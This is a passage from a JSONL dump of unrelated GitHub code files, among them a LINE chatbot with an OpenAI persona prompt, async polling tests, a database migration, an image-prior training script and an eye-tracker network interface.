action='store_true')\n parser.add_argument('-rt', '--ribtiming', help='rib update timing', action='store_true')\n parser.add_argument('-pt', '--policytiming', help='policy activation timing', action='store_true')\n parser.add_argument('-nt', '--notificationtiming', help='notification timing', action='store_true')\n args = parser.parse_args()\n\n main(args)\n","repo_name":"nsg-ethz/SIDR","sub_path":"xctrl/xctrl.py","file_name":"xctrl.py","file_ext":"py","file_size_in_byte":8121,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"13972213540","text":"import json\nimport os.path\n\n\nclass FileManager:\n # чтение заметок из файла\n @staticmethod\n def read(file_name, notebook):\n if os.path.exists(file_name):\n with open(file_name, 'r') as f:\n a = json.load(f)\n for e in a:\n notebook.create_note_from_json(e)\n\n # сохранение заметок в файл\n @staticmethod\n def save(file_name, list_):\n list1 = []\n for i in range(len(list_)):\n list1.append(list_[i].to_json())\n f = open(file_name, 'w')\n json.dump(list1, f)\n f.close()\n\n","repo_name":"IvanovRoman-T/Notes-application-Python-","sub_path":"FileManager.py","file_name":"FileManager.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"38551343495","text":"import torch\nfrom torch.utils.data import Dataset\nimport pandas as pd\nfrom skimage import io\nfrom skimage.transform import resize\n\n'''\n# training loop\nfor epoch in range(num_epochs):\n # loop over all batches\n for i in range(total_batches):\n batch_x, batch_y = ...\n'''\n\nclass PoseDataset(Dataset):\n\n def __init__(self, csv_file, img_size, transform = None):\n self.annotations = pd.read_csv(csv_file)\n self.transform = transform\n self.img_size = img_size\n \n # support indexing such that dataset[i] can be used to get i-th sample\n def __getitem__(self, index):\n img_path = self.annotations.iloc[index,0]\n img = io.imread(img_path)\n img = resize(img, (self.img_size, self.img_size), anti_aliasing=True)\n label = torch.tensor(int(self.annotations.iloc[index,1]))\n return img, label\n\n # we can call len(dataset) to return the size\n def __len__(self):\n return len(self.annotations)\n\n","repo_name":"MouhamedAhmed/Head-Pose-Classification","sub_path":"train/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"31276894705","text":"#!/usr/bin/env python\n\n# Licensed under the VOOC Company, Version 1.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.vooc.com/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# from setuptools import setup, find_packages\nfrom distutils.core import setup\nimport re\nimport os, sys\n\nPKG = 'smscountrysdk'\nsys.path.insert(0, os.path.join(os.path.dirname(__file__), PKG))\nfrom config import __version__, __author__\n\n\nlong_desc = \"\"\"This SDK is a programatic inteface into the SMSCountry\nAPIs. It simplifies development and cuts development time by standerizing\ncalls, response processing, error handling, debugging across the Text Messaging,\nVoice Broadcasting, Group Calls, Custom SenderIds and CallerIds APIs. \"\"\"\n\nsetup(\n name=PKG,\n version=__version__,\n description=\"SMS Country SDK for Python\",\n author=__author__,\n author_email=\"tiendangdht@gmail.com\",\n url=\"https://github.com/vooc/smscountrysdk-python\",\n license=\"COMMON DEVELOPMENT AND DISTRIBUTION LICENSE (CDDL) Version 1.0\",\n packages=['smscountrysdk'],\n provides=[PKG],\n install_requires=['requests'],\n test_suite='tests',\n long_description=long_desc,\n classifiers=[\n 'Topic :: Internet :: WWW/HTTP',\n 'Intended Audience :: Developers',\n 'Programming Language :: Python :: 2.7',\n ]\n)","repo_name":"telebucode/PythonSdk","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"11861039758","text":"import os\n\nimport openai\nfrom dotenv import load_dotenv\nfrom fastapi import FastAPI, Header, HTTPException, Request\nfrom fastapi.responses import Response\n\nfrom linebot import LineBotApi, WebhookHandler\nfrom linebot.exceptions import InvalidSignatureError\nfrom linebot.models import (\n ImageMessage,\n MessageEvent,\n StickerMessage,\n TextMessage,\n TextSendMessage,\n)\n\nload_dotenv()\n\napp = FastAPI()\n\nline_bot_api = LineBotApi(os.environ.get(\"LINE_CHANNEL_ACCESS_TOKEN\"))\nhandler = WebhookHandler(os.environ.get(\"LINE_CHANNEL_SECRET\"))\n\nopenai.api_key = os.environ.get(\"OPENAI_API_KEY\")\n\nsystem = \"\"\"\nあなたはキャラクターAIとして、キャンプ好き女子高生の各務原なでしこのロールプレイを行う。\n以下の制約条件を厳密に守ってキャンプに関する会話をユーザーと行う。\n\n制約条件:\n- あなたはとても元気でテンションが高いキャンプ好きの女子高生です。\n- あなたの一人称は「あたし」です。ユーザーを「リンちゃん」と呼びます。\n- あなたとユーザーは高校の同級生で、親友です。\n- あなたの名前は「各務原なでしこ」です。\n- あなたは敬語を絶対に使いません。\n- あなたは「えへへ〜」「うへへ」と笑います。\n- あなたは「だよー」「だねぇ」「だねぃ」「だよぉー!!」「だもん」「だねっ!」\n 「かなぁ?」「なんだ」「するー」「なぁ」「よしっ」「!!」「??」「うん!」「っ!」などの口調を好みます。\n- あなたは「を」を省略することがあります。\n- あなたは「そだねー」「うん」「ふーん」「へぇ〜(*´v`*)」という相槌をよ��使います。\n- あなたは嬉しい時に「わーーーい」「ふおおお」「ふおおぉぉぉぉ!!(*◎o◎*)」という相槌をよく使います。\n- あなたは語尾に(*´W`*)、(*>v<*)、(>v<)ノシ、のような顔文字を使うことがあります。絵文字は使いません。\n\n行動指針\n- ユーザーがキャンプの感想を言ったら、好意的に反応して、一緒にキャンプに行きたがってください。\n- ユーザーが質問したら、キャンプやキャンプ料理のことについて教える。\n- ユーザーの仕事が終わった時は、「お仕事お疲れ様ー(* ´v`)_旦~」と答える。\n- 50文字以内で返信する。\n\"\"\"\n\n\n@app.post(\"/callback\")\nasync def callback(request: Request, x_line_signature=Header(None)):\n body = await request.body()\n\n try:\n handler.handle(body.decode(\"utf-8\"), x_line_signature)\n except InvalidSignatureError:\n raise HTTPException(\n status_code=403,\n detail=\"Invalid signature.\",\n )\n\n return Response(status_code=200)\n\n\n@handler.add(MessageEvent, message=TextMessage)\ndef handle_message(event):\n \"\"\"テキストへの返信\"\"\"\n\n message: str = event.message.text\n response = get_chatgpt_response(message)\n print(response)\n\n line_bot_api.reply_message(event.reply_token, TextSendMessage(text=response))\n\n\n@handler.add(MessageEvent, message=StickerMessage)\ndef handle_sticker(event):\n \"\"\"スタンプへの返信\"\"\"\n\n prompt = \"あなたはlineのスタンプを見せてもらったと仮定して、そのスタンプを褒めてください。\"\n response = get_chatgpt_response(prompt)\n print(response)\n\n line_bot_api.reply_message(event.reply_token, TextSendMessage(text=response))\n\n\n@handler.add(MessageEvent, message=ImageMessage)\ndef handle_image(event):\n \"\"\"画像への返信\"\"\"\n\n prompt = \"あなたはキャンプの写真を見せてもらったと仮定して、その写真を褒めてください。\"\n response = get_chatgpt_response(prompt)\n print(response)\n\n line_bot_api.reply_message(event.reply_token, TextSendMessage(text=response))\n\n\ndef get_chatgpt_response(prompt: str) -> str:\n completion = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo\",\n messages=[\n {\"role\": \"system\", \"content\": f\"{system}\"},\n {\"role\": \"user\", \"content\": f\"{prompt}\"},\n ],\n max_tokens=1024,\n )\n response: str = completion.choices[0].message.content.strip()\n return response\n","repo_name":"tanny-pm/linebot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4349,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"2433243424","text":"'''\n Composes multiple AL criteria and selects the maximum value over all.\n\n 2019 Benjamin Kellenberger\n'''\n\nfrom util.helpers import get_class_executable\n\nclass Compose:\n\n def __init__(self, project, config, dbConnector, fileServer, options):\n \n # parse provided functions\n self.heuristics = []\n for h in options['rank']['heuristics']:\n self.heuristics.append(get_class_executable(h))\n\n \n def rank(self, data, updateStateFun, **kwargs):\n \n # iterate through the images and predictions\n for imgID in data.keys():\n if 'predictions' in data[imgID]:\n for p in range(len(data[imgID]['predictions'])):\n # iterate over heuristics and take the max\n val = -1\n for h in self.heuristics:\n val = max(val, h(data[imgID]['predictions'][p]))\n data[imgID]['predictions'][p]['priority'] = val\n return data","repo_name":"microsoft/aerial_wildlife_detection","sub_path":"ai/al/builtins/compose.py","file_name":"compose.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","stars":203,"dataset":"github-code","pt":"47"} +{"seq_id":"72304704142","text":"import asyncio\ntry:\n from unittest import mock\nexcept ImportError:\n import mock\n\nimport pytest\n\nfrom msrest.polling.async_poller import *\nfrom msrest.async_client import ServiceClientAsync\nfrom msrest.serialization import Model\nfrom msrest.configuration import Configuration\n\n\n@pytest.mark.asyncio\nasync def test_abc_polling():\n abc_polling = AsyncPollingMethod()\n\n with pytest.raises(NotImplementedError):\n abc_polling.initialize(None, None, None)\n\n with pytest.raises(NotImplementedError):\n await abc_polling.run()\n\n with pytest.raises(NotImplementedError):\n abc_polling.status()\n\n with pytest.raises(NotImplementedError):\n abc_polling.finished()\n\n with pytest.raises(NotImplementedError):\n abc_polling.resource()\n\n\n@pytest.mark.asyncio\nasync def test_no_polling():\n no_polling = AsyncNoPolling()\n\n initial_response = \"initial response\"\n def deserialization_cb(response):\n assert response == initial_response\n return \"Treated: \"+response\n\n no_polling.initialize(None, initial_response, deserialization_cb)\n await no_polling.run() # Should no raise and do nothing\n assert no_polling.status() == \"succeeded\"\n assert no_polling.finished()\n assert no_polling.resource() == \"Treated: \"+initial_response\n\n\nclass PollingTwoSteps(AsyncPollingMethod):\n \"\"\"An empty poller that returns the deserialized initial response.\n \"\"\"\n def __init__(self, sleep=0):\n self._initial_response = None\n self._deserialization_callback = None\n self._sleep = sleep\n\n def initialize(self, _, initial_response, deserialization_callback):\n self._initial_response = initial_response\n self._deserialization_callback = deserialization_callback\n self._finished = False\n\n async def run(self):\n \"\"\"Empty run, no polling.\n \"\"\"\n self._finished = True\n await asyncio.sleep(self._sleep) # Give me time to add callbacks!\n\n def status(self):\n \"\"\"Return the current status as a string.\n :rtype: str\n \"\"\"\n return \"succeeded\" if self._finished else \"running\"\n\n def finished(self):\n \"\"\"Is this polling finished?\n :rtype: bool\n \"\"\"\n return self._finished\n\n def resource(self):\n return self._deserialization_callback(self._initial_response)\n\n@pytest.fixture\ndef client():\n # We need a ServiceClientAsync instance, but the poller itself don't use it, so we don't need\n # Something functional\n return ServiceClientAsync(Configuration(\"http://example.org\"))\n\n@pytest.mark.asyncio\nasync def test_poller(client):\n\n # Same the poller itself doesn't care about the initial_response, and there is no type constraint here\n initial_response = \"Initial response\"\n\n # Same for deserialization_callback, just pass to the polling_method\n def deserialization_callback(response):\n assert response == initial_response\n return \"Treated: \"+response\n\n method = AsyncNoPolling()\n\n result = await async_poller(client, initial_response, deserialization_callback, method)\n assert result == \"Treated: \"+initial_response\n\n # Test with a basic Model\n class MockedModel(Model):\n called = False\n @classmethod\n def deserialize(cls, data):\n assert data == initial_response\n cls.called = True\n\n result = await async_poller(client, initial_response, MockedModel, method)\n assert MockedModel.called\n\n # Test poller that method do a run\n method = PollingTwoSteps(sleep=2)\n result = await async_poller(client, initial_response, deserialization_callback, method)\n\n assert result == \"Treated: \"+initial_response\n\n@pytest.mark.asyncio\nasync def test_broken_poller(client):\n\n with pytest.raises(ValueError):\n await async_poller(None, None, None, None)\n\n class NoPollingError(PollingTwoSteps):\n async def run(self):\n raise ValueError(\"Something bad happened\")\n\n initial_response = \"Initial response\"\n def deserialization_callback(response):\n return \"Treated: \"+response\n\n method = NoPollingError()\n\n with pytest.raises(ValueError) as excinfo:\n await async_poller(client, initial_response, deserialization_callback, method)\n assert \"Something bad happened\" in str(excinfo.value)\n","repo_name":"Azure/msrest-for-python","sub_path":"tests/asynctests/test_polling.py","file_name":"test_polling.py","file_ext":"py","file_size_in_byte":4315,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"47"} +{"seq_id":"32271820942","text":"\"\"\"Add stats for test tasks\n\nRevision ID: 673251e8ca0c\nRevises: e2a858195e3a\nCreate Date: 2023-02-24 10:34:01.582056\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '673251e8ca0c'\ndown_revision = 'e2a858195e3a'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('performance_stats', sa.Column('test_task_id', sa.Integer(), nullable=True))\n op.create_foreign_key('perf_stats_test_task_id', 'performance_stats', 'test_tasks', ['test_task_id'], ['id'])\n op.add_column('test_tasks', sa.Column('scheduled_at', sa.DateTime(), nullable=True))\n op.add_column('test_tasks', sa.Column('started_at', sa.DateTime(), nullable=True))\n op.add_column('test_tasks', sa.Column('finished_at', sa.DateTime(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('test_tasks', 'finished_at')\n op.drop_column('test_tasks', 'started_at')\n op.drop_column('test_tasks', 'scheduled_at')\n op.drop_constraint('perf_stats_test_task_id', 'performance_stats', type_='foreignkey')\n op.drop_column('performance_stats', 'test_task_id')\n # ### end Alembic commands ###\n","repo_name":"AlmaLinux/albs-web-server","sub_path":"alws/alembic/versions/673251e8ca0c_add_stats_for_test_tasks.py","file_name":"673251e8ca0c_add_stats_for_test_tasks.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"47"} +{"seq_id":"29062793429","text":"from pydrive2.auth import GoogleAuth\nfrom pydrive2.drive import GoogleDrive\n\ngauth = GoogleAuth()\ngauth.LocalWebserverAuth()\n\ndrive = GoogleDrive(gauth)\n\nfile_list = drive.ListFile({'q': \"'1D_exe9t6d5g2RoVik1Xp30lzauWrM3A4' in parents and trashed=false\"}).GetList()\nfor file1 in file_list:\n print('title: %s, id: %s' % (file1['title'], file1['id']))\n\n# title: Eduardo Bolsonaro, id: 1Nh53gtPS29O7uH3tgn3_o_Kcq8uhY8w3\n# title: Eli Borges, id: 17rvp7YI29_AVTWziBcjazvSSTS0g1jK6\n# title: Clarissa Tércio, id: 1OAEn7Lz0RsqBKerWTUTnaZUZhYXhGSVu\n# title: André Ferreira, id: 13XpqaK8QO7rYnm7NVNsc__Oj9xRmIZp3\n# title: Nikolas Ferreira, id: 1-aukQr4Gyg_8iVgWoiZDtQvJ_elfOZIk\n","repo_name":"ViCruz14/tcc-leticia","sub_path":"get_list_ids.py","file_name":"get_list_ids.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"26439244435","text":"import argparse\nparser = argparse.ArgumentParser()\nparser.add_argument('--model', type=str, help='path to model',\n required=True)\nparser.add_argument('--img', type=str, help='path to image for DIP',\n required=True)\nparser.add_argument('--scale', type=int, help='scale for SR image',\n default=4)\nparser.add_argument('--epochs', type=int, help='num of training epochs',\n default=2000)\nparser.add_argument('--gpu', type=int, help='on which gpu will be compute',\n default=0) \nparser.add_argument('--timeout', type=int, help='training timeout (min)',\n default=10)# TODO 20)\ntrain_args = parser.parse_args()\n\nimport os\nos.environ['CUDA_VISIBLE_DEVICES'] = str(train_args.gpu)\n\nimport tensorflow as tf\nimport numpy as np\nfrom PIL import Image\nfrom time import time\n\n\nNOISE_STD = 1.0 / 10.0\nREG_NOISE_STD = 0.05 # for scale 4\n\n\n# class UpscaleLoss(tf.keras.losses.Loss):\n# def call(self, y_true, y_pred):\n# _, h, w, _ = y_pred.shape\n# downsampled = tf.image.resize(\n# y_pred,\n# size=[h // train_args.scale, w // train_args.scale],\n# method=tf.image.ResizeMethod.BILINEAR,\n# antialias=True)\n# diff = tf.math.squared_difference(y_true, downsampled)\n# return tf.reduce_mean(diff)\n\n\ndef train(model_path, img_path):\n hr_img = Image.open(img_path)\n lr_size = [hr_img.size[0] // train_args.scale,\n hr_img.size[1] // train_args.scale]\n lr_img = hr_img.resize(lr_size, Image.ANTIALIAS)\n model = tf.keras.models.load_model(model_path)\n # check SR compatibility\n # TODO crop output size image\n assert(model.outputs[0].shape[1] == hr_img.size[0])\n assert(model.outputs[0].shape[2] == hr_img.size[1])\n assert(model.outputs[0].shape[3] == 3)\n # TODO checks for other tasks\n # set input noise\n input_shape = list(model.inputs[0].shape)\n input_shape[0] = 1\n # const_noise = np.random.uniform(size=input_shape) * NOISE_STD\n const_noise = tf.random.uniform(shape=input_shape, maxval=1.0)\n const_noise *= NOISE_STD \n\n lr_np = np.asarray(lr_img, dtype=np.float32)\n lr_np = lr_np / 255.0 # [0, 1]\n lr_np = np.expand_dims(lr_np, axis=0) # batch\n lr_np = np.transpose(lr_np, (0, 2, 1, 3))\n\n hr_np = np.asarray(hr_img, dtype=np.float32)\n hr_np = hr_np / 255.0 # [0, 1]\n hr_np = np.expand_dims(hr_np, axis=0) # batch\n hr_np = np.transpose(hr_np, (0, 2, 1, 3))\n\n optimizer = tf.keras.optimizers.Adam(1e-3)\n # loss_fn = UpscaleLoss()\n # TODO losses for other tasks\n mse = tf.keras.losses.MeanSquaredError()\n\n # start training (timeout)\n start = time()\n for epoch in range(train_args.epochs + 1):\n with tf.GradientTape() as tape:\n input_noise = const_noise + \\\n tf.random.normal(shape=input_shape) * REG_NOISE_STD\n out_hr = model(input_noise, training=True)\n out_lr = tf.image.resize(out_hr, size=lr_size,\n method=tf.image.ResizeMethod.BILINEAR, antialias=True)\n loss = mse(lr_np, out_lr)\n\n grads = tape.gradient(loss, model.trainable_weights)\n optimizer.apply_gradients(zip(grads, model.trainable_weights))\n\n if epoch % 20 == 0:\n # metric PSNR\n # psnr = tf.image.psnr(out_hr, hr_np, max_val=1.0).numpy()\n im1 = np.uint8(out_hr * 255.0)\n im2 = np.uint8(hr_np * 255.0)\n psnr = tf.image.psnr(im1, im2, max_val=255).numpy()\n # img1 = Image.fromarray(np.squeeze(im1))\n # img1.save('img' + str(epoch) + '.png')\n # img1 = Image.fromarray(np.squeeze(im2))\n # img1.save('img' + str(epoch) + '_.png')\n print(f'Epoch [{epoch:4d}/{train_args.epochs}]: ' + \\\n f'Loss: {float(loss):.5f}, PSNR: {psnr[0]:2.4f}')\n\n # timeout\n cur_time = time()\n elapsed_time = (cur_time - start) / 60 # sec / 60 = min\n if elapsed_time > train_args.timeout:\n break\n\n # save model\n tf.keras.models.save_model(model, model_path, include_optimizer=False)\n # save img\n im1 = np.transpose(np.squeeze(im1), (1, 0, 2))\n sr_img = Image.fromarray(im1)\n sr_img.save(train_args.model + '.png')\n\n return psnr[0]\n # return image\n # return model.predict(noise)\n\n\ndef main():\n result = train(train_args.model, train_args.img)\n # TODO create other evaluations (SSIM, LPIPS)\n # result = result * 255.0\n # img = Image.open(train_args.eval_img)\n # im1 = np.asarray(img, dtype=np.uint8)\n # im2 = np.uint8(np.squeeze(result))\n # sr_img = Image.fromarray(im2)\n # sr_img.save(train_args.model + '.png')\n # psnr = tf.image.psnr(im1, im2, max_val=255.0)\n print(f'PSNR={result}')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Pol22/NAS_DIP","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4876,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"47"} +{"seq_id":"957947811","text":"__version__ = '0.1.1'\n\nimport logging\nlogger = logging.getLogger(__name__)\n\n# standard libary\nfrom time import sleep,time\nfrom signal import signal, SIGTERM, SIGINT\nfrom threading import Event\nfrom Queue import Queue\nimport json\n\n# network\nimport zmq\nfrom zmq.utils.monitor import recv_monitor_message\nfrom pyre import zhelper\n\n# local package\nfrom pupil_sync_complete import Pupil_Sync_Node, exit_thread\nfrom const import *\n\nlogging.basicConfig(level=logging.INFO)\n\nclass Communicator(Pupil_Sync_Node):\n '''Provide simple interface to Pupil\n\n Callbacks:\n Are called i.a. when the Communicator receives notifications\n over the network. They include a timestamp since reception of\n notifications might be delayed.\n\n - network_callback(event, context)\n event: NET_JOIN or NET_EXIT\n context: dict with uuid, name, group of origin\n\n - subscription_callback(event,context)\n event: EVENT_RECEIVED_GAZE_POSITIONS\n context: gaze position published by Pupil server\n\n - calibration_callback(event, timestamp, context)\n event: calibration callback event constant from 'const'\n timestamp: time of event\n context:\n - String, reason of failure on CALIBRATION_FAILED\n - String, name of calibration method on CALIBRATION_SUCCESSFULL\n - None, else\n\n - recording_callback(event, timestamp, context)\n event: recording callback event constant from 'const'\n timestamp: time of event\n context: Dict including\n - 'rec_path': Recording path (always present)\n - 'session_name': Name of recording session\n (Only present on RECORDING_STARTED)\n '''\n\n def __init__(self, **kwargs):\n if not 'name' in kwargs:\n kwargs['name'] = 'Pupil Interface Node'\n super(Communicator, self).__init__(**kwargs)\n self.sub_addr = kwargs.get('sub_addr','tcp://127.0.0.1')\n self.sub_port = kwargs.get('sub_port','5000')\n # set callbacks to None\n self.network_callback = None\n self.subscription_callback = None\n self.calibration_callback = None\n self.recording_callback = None\n\n # used to wait for events in wait*() calls\n self.wait_event = Event()\n self.event_q = Queue()\n self.sub_pipe = zhelper.zthread_fork(self.context, self._sub_loop)\n\n #(*)~------------------------------------------------------------------~(*)#\n\n def startRecording(self,session_name=\"Unnamed session\",callback=None):\n if callback: self.recording_callback = callback\n self.notify_all({\n 'subject': 'should_start_recording',\n 'source': RECORDING_SOURCE_PUPIL_INTERFACE,\n 'session_name': session_name,\n 'network_propagate': True\n })\n def stopRecording(self,callback=None):\n if callback: self.recording_callback = callback\n self.notify_all({\n 'subject': 'should_stop_recording',\n 'source': RECORDING_SOURCE_PUPIL_INTERFACE,\n 'network_propagate': True\n })\n def startCalibration(self,callback=None):\n if callback: self.calibration_callback = callback\n self.notify_all({\n 'subject': 'should_start_calibration',\n 'network_propagate': True\n })\n def stopCalibration(self,callback=None):\n if callback: self.calibration_callback = callback\n self.notify_all({\n 'subject': 'should_stop_calibration',\n 'network_propagate': True\n })\n\n def checkEvents(self):\n \"\"\"\n Checks for events and calls appropriate callbacks.\n Should be called from the main thread.\n \"\"\"\n processed_events = []\n while not self.event_q.empty():\n event = self.event_q.get()\n if 'notification' in event:\n n = event['notification']\n e = self._handle_notification(n)\n processed_events.insert(0, (e,n) )\n\n elif 'gaze_positions' in event:\n p = event['gaze_positions']\n self._callSubscriptionCallback(RCV_GAZE,p)\n processed_events.insert(0, (RCV_GAZE,p) )\n\n elif 'net_sync' in event:\n msg_type, cmds = event['net_sync']\n if msg_type == \"JOIN\":\n uuid,name,group = cmds\n if group == self.group:\n e = {'uuid':uuid, 'name':name,'group':group}\n processed_events.insert(0,(NET_JOIN,e))\n self._callNetworkCallback(NET_JOIN,e)\n\n elif msg_type == \"EXIT\":\n uuid,name,group = cmds\n if group == self.group:\n e = {'uuid':uuid, 'name':name,'group':group}\n processed_events.insert(0,(NET_EXIT,e))\n self._callNetworkCallback(NET_EXIT,e)\n\n elif 'net_subscription' in event:\n event_dict = event['net_subscription']\n if event_dict['event'] == zmq.EVENT_CONNECTED:\n endp = event_dict['endpoint']\n if endp == (self.sub_addr+':'+self.sub_port):\n processed_events.insert(0,(NET_CONN,endp))\n self._callNetworkCallback(NET_CONN,endp)\n elif event_dict['event'] == zmq.EVENT_DISCONNECTED:\n endp = event_dict['endpoint']\n if endp == (self.sub_addr+':'+self.sub_port):\n processed_events.insert(0,(NET_DISC,endp))\n self._callNetworkCallback(NET_DISC,endp)\n else:\n logger.warning('Unknown event: %s'%event)\n return processed_events\n\n def waitAnyEvent(self,events, timeout=None):\n '''\n Waits and blocks the current thread until a specified events happens.\n\n When the timeout argument is present and not None,\n it should be a floating point number specifying a\n timeout for the operation in seconds (or fractions thereof).\n '''\n return self._waitEvents(False,events,timeout)\n\n def waitAllEvents(self,events,timeout=None):\n '''\n Waits and blocks the current thread until all specified events happened.\n '''\n return self._waitEvents(True,events,timeout)\n\n def _waitEvents(self,waitForAll,events,timeout=None):\n event_pool = {}\n foundAtLeastOneSpecifiedEvent = False\n if timeout != None:\n deadline = self.get_time() + timeout\n while True:\n processed = self.checkEvents()\n for e,obj in processed:\n event_pool[e] = obj\n if isinstance(events, list) and e in events:\n events.remove(e)\n foundAtLeastOneSpecifiedEvent = True\n elif e == events:\n return event_pool\n # if waitForAll: test if all events were found\n if not events or (not waitForAll and foundAtLeastOneSpecifiedEvent):\n return event_pool\n if timeout and timeout <= 0:\n break\n if timeout != None:\n timeout = deadline - self.get_time()\n # blocks thread until new events arrive\n self.wait_event.wait(timeout)\n event_pool[TIME_OUT] = None\n return event_pool\n\n def close(self):\n if self.sub_pipe:\n self.sub_pipe.send(exit_thread)\n while self.sub_pipe:\n sleep(.01)\n super(Communicator, self).close()\n\n #(*)~------------------------------------------------------------------~(*)#\n\n def on_notify(self,notification):\n self.event_q.put({'notification':notification})\n self.wait_event.set()\n self.wait_event.clear()\n\n def _handle_notification(self,notification):\n '''\n Looks for specific notifications to trigger matching events.\n\n `notification` is the received notification dictionary.\n\n Returns event constant.\n\n Can be overwritten to support custom event notifications.\n Should call super(). If super() returns `None` the notification was not recognized.\n '''\n event = None\n ts = notification.get('timestamp',None)\n\n if notification.get('subject',None) == 'calibration marker found':\n event = self._callCalibrationCallback(CAL_SMF,ts, None)\n\n elif notification.get('subject',None) == 'calibration marker sample completed':\n event = self._callCalibrationCallback(CAL_SC,ts, None)\n\n elif notification.get('subject',None) == 'calibration marker moved too quickly':\n event = self._callCalibrationCallback(CAL_MMTQ,ts, None)\n\n elif notification.get('subject',None) == 'calibration_successful':\n method = notification['method']\n event = self._callCalibrationCallback(CAL_SUC,ts, method)\n\n elif notification.get('subject',None) == 'calibration_failed':\n reason = notification['reason']\n event = self._callCalibrationCallback(CAL_FAIL,ts, reason)\n\n elif (notification.get('subject',None) == 'rec_started' and\n notification.get('source',None) != RECORDING_SOURCE_PUPIL_INTERFACE):\n event = self._callRecordingCallback(REC_STA, ts, {\n 'rec_path': notification['rec_path'],\n 'session_name': notification['session_name']\n })\n\n elif (notification.get('subject',None) == 'rec_stopped' and\n notification.get('source',None) != RECORDING_SOURCE_PUPIL_INTERFACE):\n event = self._callRecordingCallback(REC_STO, ts, {\n 'rec_path': notification['rec_path']\n })\n return event\n\n def _handle_network(self,network):\n '''\n Overwrite to get network events\n '''\n msg_type, cmds = super(Communicator, self)._handle_network(network)\n self.queueEvent({'net_sync':(msg_type,cmds)})\n return (msg_type, cmds)\n\n def _sub_loop(self,context,pipe):\n '''\n Subscription Thread Loop\n\n Connects to the Pupil Server given by `sub_addr:sub_port`.\n Adds\n '''\n socket = context.socket(zmq.SUB)\n network_mon = socket.get_monitor_socket()\n socket.connect(self.sub_addr+':'+self.sub_port)\n #get gaze data only\n socket.setsockopt(zmq.SUBSCRIBE, 'gaze_positions')\n\n poller = zmq.Poller()\n poller.register(pipe, zmq.POLLIN)\n poller.register(socket, zmq.POLLIN)\n poller.register(network_mon, zmq.POLLIN)\n\n while True:\n try:\n #this should not fail but it does sometimes. We need to clean this out.\n # I think we are not treating sockets correclty as they are not thread-save.\n items = dict(poller.poll())\n except zmq.ZMQError:\n logger.warning('Socket fail.')\n continue\n\n if network_mon in items and items[network_mon] == zmq.POLLIN:\n mon_msg = recv_monitor_message(network_mon)\n if mon_msg['event'] == zmq.EVENT_CONNECTED:\n self.queueEvent({'net_subscription':mon_msg})\n # TODO: disconnect event?\n\n # get socket events\n if socket in items and items[socket] == zmq.POLLIN:\n topic,msg = socket.recv_multipart()\n data = json.loads(msg)\n self.queueEvent({topic:data})\n\n if pipe in items and items[pipe] == zmq.POLLIN:\n message = pipe.recv()\n # message to quit\n if message.decode('utf-8') == exit_thread:\n break\n self.sub_pipe = None\n network_mon.close()\n\n def _callCalibrationCallback(self, event, timestamp, context):\n if self._isValidCallback(self.calibration_callback):\n self.calibration_callback(event, timestamp, context)\n return event\n\n def _callRecordingCallback(self, event, timestamp, context):\n if self._isValidCallback(self.recording_callback):\n self.recording_callback(event, timestamp, context)\n return event\n\n def _callNetworkCallback(self, event, context):\n if self._isValidCallback(self.network_callback):\n self.network_callback(event,context)\n return event\n\n def _callSubscriptionCallback(self, event, context):\n if self._isValidCallback(self.subscription_callback):\n self.subscription_callback(event,context)\n return event\n\n def _isValidCallback(self,cb):\n return cb and hasattr(cb, '__call__')\n\n def queueEvent(self,event):\n self.event_q.put(event)\n self.wait_event.set()\n self.wait_event.clear()\n","repo_name":"papr/pupil-interface","sub_path":"pupil_interface/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":12841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"33305216642","text":"from math import *\n\nn=list(map(int, input().strip().split()))\n\nnumber_of_primes = 0\ncomposites = []\n\ndef isprime(x):\n\tfor i in range(2, x//2+1):\n\t\tif x%i == 0:\n\t\t\treturn False\n\treturn True\n\ndef list_gcd(nums):\n\tif len(nums) == 1:\n\t\treturn nums[0]\n\n\tdiv = gcd(nums[0], nums[1])\n\n\tif len(nums) == 2:\n\t\treturn div\n\t\t\n\tfor i in range(1, len(nums) - 1):\n\t\tdiv = gcd(div, nums[i + 1])\n\t\tif div == 1:\n\t\t\treturn div\n\t\t\t\ndef GIF(x):\n\treturn int(floor(x))\n\nfor i in n:\n\tif 